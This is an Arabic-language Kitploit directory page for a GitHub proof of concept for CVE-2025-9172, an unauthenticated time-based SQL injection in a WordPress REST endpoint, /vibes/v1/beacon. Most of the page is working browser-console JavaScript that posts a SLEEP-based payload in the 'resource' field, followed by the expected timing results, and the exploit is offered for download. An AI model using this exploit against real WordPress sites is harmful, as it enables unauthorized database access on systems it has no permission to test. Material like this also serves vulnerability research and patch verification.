Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-9172 — استغلال إثبات المفهوم لثغرة حقن SQL قائم على الزمن بدون مصادقة في نقطة نهاية REST `/vibes/v1/beacon` في ووردبريس، مع إثبات مفهوم عبر وحدة تحكم المتصفح يوضح الحقن القائم على SLEEP. | Kitploit
أدوات/GitHubGitHub/jfriedli/cve-2025-9172
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubjfriedli/cve-2025-9172

CVE-2025-9172

استغلال إثبات المفهوم لثغرة حقن SQL قائم على الزمن بدون مصادقة في نقطة نهاية REST `/vibes/v1/beacon` في ووردبريس، مع إثبات مفهوم عبر وحدة تحكم المتصفح يوضح الحقن القائم على SLEEP.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال: حقن SQL زمني عبر /vibes/v1/beacon (بدون مصادقة)

إثبات المفهوم عبر وحدة تحكم المتصفح

root@kitploit:~
(async () => {
  const url = 'http://localhost/wordpress/index.php?rest_route=/vibes/v1/beacon';

  async function send(resource) {
    const body = {
      type: 'navigation',
      resource, // injected into SQL (unprepared)
      authenticated: 0,
      metrics: [{ name: 'wait', start: 1, duration: 1 }]
    };

    const t0 = performance.now();

    const res = await fetch(url, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(body)
    });

    await res.text();

    return {
      status: res.status,
      ms: Math.round(performance.now() - t0)
    };
  }

  console.log('Baseline (fast)…');
  console.log(await send('/a/b/c')); // expected: ~20–50ms

  console.log('Injected (time-based)…');
  console.log(await send("/a/b/c' OR SLEEP(5) OR 'x/dummy")); // expected: ~5000ms
})();

النتيجة المتوقعة

root@kitploit:~
Baseline: { status: 202, ms: ~20–50 }
Injected: { status: 202, ms: ~5000+ }
تنزيل الأداة